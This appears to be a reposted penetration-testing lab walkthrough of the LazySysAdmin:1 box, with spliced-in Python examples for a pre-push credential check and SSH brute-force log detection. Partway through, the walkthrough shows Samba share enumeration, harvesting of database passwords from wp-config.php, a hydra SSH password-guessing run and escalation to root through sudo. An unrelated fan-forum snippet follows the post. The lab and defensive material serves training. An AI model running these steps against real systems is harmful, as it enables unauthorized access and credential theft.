$ telnet 192.168.60.2 6667 Escape character is '^]' :Admin.local NOTICE Auth :*** Looking up your hostname...  >>PASS none :Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead. >>NICK Bla >>USER blah blah blah blah :Admin.local NOTICE Auth :Welcome to Localnet! :Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected] :Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0 :Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016 :Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov :Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server :Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server :Admin.local 042 Bla 690AAAAAD :your unique I :Admin.local 375 Bla :Admin.local message of the day :Admin.local 372 Bla :- Please edit /etc/inspircd/mot :Admin.local 376 Bla :End of message of the day. :Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers :Admin.local 254 Bla 0 :channels formed :Admin.local 255 Bla :I have 1 clients and 0 servers :Admin.local 265 Bla :Current Local Users: 1  Max: 1 :Admin.local 266 Bla :Current Global Users: 1  Max: 1
Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET Nmap scan report for 192.168.60.2 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: LAZYSYSADMIN Host script results: | smb-enum-shares: | account_used: guest | \\192.168.60.2\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Web server) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.60.2\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\192.168.60.2\share$: | Type: STYPE_DISKTREE | Comment: Sumshare | Users: 0 | Max Users: | Path: C:\var\www\html\ | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE
Oh, nice! A guest writeable directory. Maybe we can snoop around…
$ mkdir share $ mount_smbfs //guest:@192.168.60.2/share$ share $ cd share $ tree -L 2 .
. ├── Backnode_files │   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg │   ├── failure-good-thing-fixed.png │   ├── front-end.css │   ├── front-end.js │   ├── jquery-ui.js │   ├── jquery.js │   ├── logo.png │   ├── normalize.css │   ├── pageable.js │   ├── picto1.png │   ├── picto2.png │   ├── picto3.png │   ├── script.json │   ├── styles.css │   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif ├── apache ├── deets.txt ├── index.html ├── info.php ├── old ├── robots.txt ├── test ├── todolist.txt ├── wordpress │   ├── index.php │   ├── license.txt │   ├── readme.html │   ├── wp-activate.php │   ├── wp-admin │   ├── wp-blog-header.php │   ├── wp-comments-post.php │   ├── wp-config-sample.php │   ├── wp-config.php │   ├── wp-content │   ├── wp-cron.php │   ├── wp-includes │   ├── wp-links-opml.php │   ├── wp-load.php │   ├── wp-login.php │   ├── wp-mail.php │   ├── wp-settings.php │   ├── wp-signup.php │   ├── wp-trackback.php │   └── xmlrpc.php └── wp
Really? A WordPress installation! Let us check this first.
$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we have collected some credentials here, but where can we use them?
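The two files above are the whole story of this section: a note with a plaintext password that was supposed to be removed "after we push out the server", and a wp-config.php readable through a guest share. As an added example that is not part of the original post, here is the kind of pre-push check that would have blocked the deployment while either condition held. The sample tree is constructed in a temporary directory to mirror the share listing above; build_sample_tree, preflight and run_demo are names of this example, not of any project tool, and the list of note-file extensions and the credential regex are assumptions.

```python
"""Added example: a pre-deployment check for the mistakes the write-up relies on.

Not part of the original post. deets.txt itself says "remove this file and
update your password after we push out the server"; this script fails the push
while such a note is still in the web root, and while wp-config.php is readable
by everyone rather than only by its owner (and the web server's group).
"""
import os
import re
import stat
import tempfile

# Lines that look like a credential left in a note file (assumption of this example).
SECRET_LINE = re.compile(r"(?i)\b(password|passwd|pwd|secret|api[_-]?key)")
# Extensions a web server has no business serving from the document root.
NOTE_SUFFIXES = (".txt", ".bak", ".old", ".orig", ".md")


def build_sample_tree(root):
    """Constructed sample mirroring the share listing in the write-up."""
    os.makedirs(os.path.join(root, "wordpress"), exist_ok=True)
    with open(os.path.join(root, "deets.txt"), "w") as f:
        f.write("CBF Remembering all these passwords.\n"
                "Remember to remove this file and update your password after we push out the server.\n"
                "Password 12345\n")
    with open(os.path.join(root, "todolist.txt"), "w") as f:
        f.write("Prevent users from being able to view to web root using the local file browser\n")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html>My name is togie.</html>\n")
    cfg = os.path.join(root, "wordpress", "wp-config.php")
    with open(cfg, "w") as f:
        f.write("<?php\ndefine('DB_USER', 'Admin');\ndefine('DB_PASSWORD', 'TogieMYSQL12345^^');\n")
    os.chmod(cfg, 0o644)  # world-readable, as the guest share exposed it
    return root


def preflight(root):
    """Return (relative path, problem) pairs; an empty list means safe to push."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower().endswith(NOTE_SUFFIXES):
                # Notes and backups do not belong in a served directory at all; a
                # credential-looking line inside one is the strongest signal.
                with open(path, errors="replace") as f:
                    for no, line in enumerate(f, 1):
                        if SECRET_LINE.search(line):
                            findings.append((rel, f"line {no} looks like a credential note"))
                            break
            if name == "wp-config.php":
                mode = stat.S_IMODE(os.stat(path).st_mode)
                if mode & (stat.S_IROTH | stat.S_IWOTH):
                    findings.append((rel, f"wp-config.php is readable by everyone (mode {mode:04o})"))
    return sorted(findings)


def run_demo():
    """Build the constructed tree in a scratch directory and run the check on it."""
    with tempfile.TemporaryDirectory() as tmp:
        return preflight(build_sample_tree(tmp))


if __name__ == "__main__":
    for rel, problem in run_demo():
        print(f"BLOCK PUSH: {rel}: {problem}")
```

On the constructed tree it reports deets.txt (credential note) and wordpress/wp-config.php (mode 0644); todolist.txt contains no credential-looking line and passes, and index.html is not a note file so it is never scanned.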
Land of the Apache
Maybe we should enumerate a little further. There is a website listening on port 80, so let's spider it:
$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://ift.tt/2hvafiO
+ http://ift.tt/2jlanBV (CODE:200|SIZE:36072)
+ http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236)
==> DIRECTORY: http://ift.tt/2jlao8X
==> DIRECTORY: http://ift.tt/2hyB3OZ
==> DIRECTORY: http://ift.tt/2jnXDu5
+ http://ift.tt/2htorZo (CODE:200|SIZE:92)
+ http://ift.tt/2jkJEoX (CODE:403|SIZE:292)
==> DIRECTORY: http://ift.tt/2hwIiXI
==> DIRECTORY: http://ift.tt/2jlv7cQ
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)
Ok, while dirb is still running we already have some interesting directories to look at:
http://ift.tt/2hvafiO
http://ift.tt/2hw2XeJ
http://ift.tt/2jnXDu5
http://ift.tt/2jlv7cQ
And some more. We have already seen those in the Samba enumeration. Let's try the WordPress site then…
$ curl -v http://ift.tt/2jlv7cQ
...   My name is togie. My name is togie. My name is togie. My name is togie. ...
Hmm, that togie again… Maybe we can try SSH with it…
Serpentine water monster
Let us try the login list we have collected so far:
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active
[22][ssh] host: 192.168.60.2   login: togie   password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42
Nice! So we log in as togie with the password 12345.
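The hydra run above takes a little over a minute and leaves a very recognizable trace in sshd's log: a burst of failed password attempts from one source across several usernames, followed by a successful password login from the same source. As an added example that is not part of the original write-up, the script below runs that detection over constructed auth.log lines (IPs, PIDs and ports are made up to mirror this box); the threshold and window are assumptions to tune for a real environment.

```python
"""Added example: spot an SSH password-guessing run in sshd auth.log lines.

Not part of the original write-up. The log lines are constructed to mirror what
the hydra run against this box would leave in /var/log/auth.log: a burst of
failures from one source for several usernames, followed by a success.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample; the IPs, PIDs and ports are made up.
SAMPLE_AUTH_LOG = """\
Nov  4 20:35:24 LazySysAdmin sshd[2231]: Failed password for invalid user deets from 192.168.60.1 port 40110 ssh2
Nov  4 20:35:24 LazySysAdmin sshd[2233]: Failed password for invalid user Admin from 192.168.60.1 port 40112 ssh2
Nov  4 20:35:25 LazySysAdmin sshd[2235]: Failed password for invalid user admin from 192.168.60.1 port 40114 ssh2
Nov  4 20:35:26 LazySysAdmin sshd[2237]: Failed password for togie from 192.168.60.1 port 40116 ssh2
Nov  4 20:35:27 LazySysAdmin sshd[2239]: Failed password for togie from 192.168.60.1 port 40118 ssh2
Nov  4 20:36:40 LazySysAdmin sshd[2401]: Accepted password for togie from 192.168.60.1 port 40220 ssh2
Nov  4 20:50:01 LazySysAdmin sshd[2502]: Accepted publickey for togie from 192.168.60.7 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2017):
    """Turn sshd auth lines into dicts; syslog lines carry no year, so it is a parameter."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd authentication result line
        ts = datetime.strptime(f"{year} {m['mon']} {int(m['day'])} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events, threshold=5, window_seconds=120):
    """Flag a source with >= threshold failures inside one window, plus any later
    successful login from that source (the trace a guessed password leaves)."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "Failed"]
        first_burst = None
        for i, start in enumerate(fails):
            in_window = [e for e in fails[i:]
                         if (e["ts"] - start["ts"]).total_seconds() <= window_seconds]
            if len(in_window) >= threshold:
                first_burst = start["ts"]
                break
        if first_burst is None:
            continue
        alerts.append({"type": "bruteforce", "ip": ip, "failures": len(fails),
                       "users": sorted({e["user"] for e in fails})})
        # A success after the burst is the high-priority event: the guess worked.
        for e in evs:
            if e["result"] == "Accepted" and e["ts"] >= first_burst:
                alerts.append({"type": "bruteforce_success", "ip": ip, "user": e["user"], "ts": e["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(a)
```

On the sample it raises one bruteforce alert for 192.168.60.1 (five failures across four usernames in three seconds) and one bruteforce_success alert for togie's later password login from the same address; the unrelated public-key login from 192.168.60.7 is left alone.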
$ ssh togie@$ip
##################################################################################################
#                                Welcome to Web_TR1                                              #
#                    All connections are monitored and recorded                                  #
#            Disconnect IMMEDIATELY if you are not an authorized user!                           #
##################################################################################################
togie@192.168.60.2's password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  http://ift.tt/ABdZxn

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 192.168.60.2
  Swap usage:   0%

  Graph this data and manage this system at:
    http://ift.tt/XlAX5B

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We are in the sudo group…
Flag
$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)
Hope you learn't a few things along the way.

Regards,
Togie Mcdogie

Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.
morexlapis · 6 months
Note
sapphic zhongtao fan... ur so based i thought i was the only one who saw the vision
Anon ilysm.. /p WE’RE IN THIS TOGETHERRRRRRRR 🤝🤝🤝🤝🤝🤝🤝🤝🤝🤝🤝